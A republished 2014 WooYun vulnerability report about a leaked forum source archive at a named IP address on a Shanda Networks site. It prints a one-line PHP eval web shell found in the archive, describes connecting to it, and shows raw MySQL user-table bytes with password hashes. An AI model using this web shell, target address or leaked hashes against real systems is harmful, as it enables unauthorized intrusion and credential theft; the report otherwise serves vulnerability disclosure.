记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

盛大网络某站源码泄露变相GETSHELL

2014-12-11 21:01

WooYun: 盛大某站存在源码泄露导致getshell

没事看看你们的历史漏洞,发现这个,然后我手贱了,本来是http://116.211.21.204/bbs/bbs.rar,我换成了

http://116.211.21.204/bbs.rar,cao,直接下载了,我也是醉了,你们就不能登陆到服务器稍微检查下?。。

1111.JPG



还没结束,我随便翻翻,因为uckey肯定没有用了啊,被改了,没法shell了。谁知道

1111.JPG



有没有觉得这个文件不正常?

打开一看直接

code 区域
<?php eval($_POST['w']);?>



我无语了,真是哪里有洞补哪里。

尝试练了下。。连上了

1111.JPG



据说现在有shell是20rank。

随便翻了翻,感觉继续渗透很可行啊,本机提权加内网渗透

code 区域
D:\mysql\MySQL\data\mysql\



code 区域
 U #       \ûlocalhostroot*40974E53D386DCFC5 Q       ûlocalhost *F2F39747C6CE9DB18 29A493AC586D44B1F294DDFC   Rû%xmbbs_911*40974E53D386DCFC59A493AC586D44B1F294DDFC       I       Lû% *F2F39747C6CE9DB18 27F4DA87E5F34E3CC82AC32F   27F4DA87E5F34E3CC82AC32F     dÿÿÿÿÿÿÿÿ      è974E53D386DCFC59A493AC586D44B1F294DDFC                  `      „       Ðbs&new*40974E53D386DCFC59A493AC586D44B1F294DDFC



求授权以后拿到shell可以内网渗透。没授权就算了

漏洞证明:

http://116.211.21.204/bbs.rar

1111.JPG

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-080982

阅读:69881 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“盛大网络某站源码泄露变相GETSHELL”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云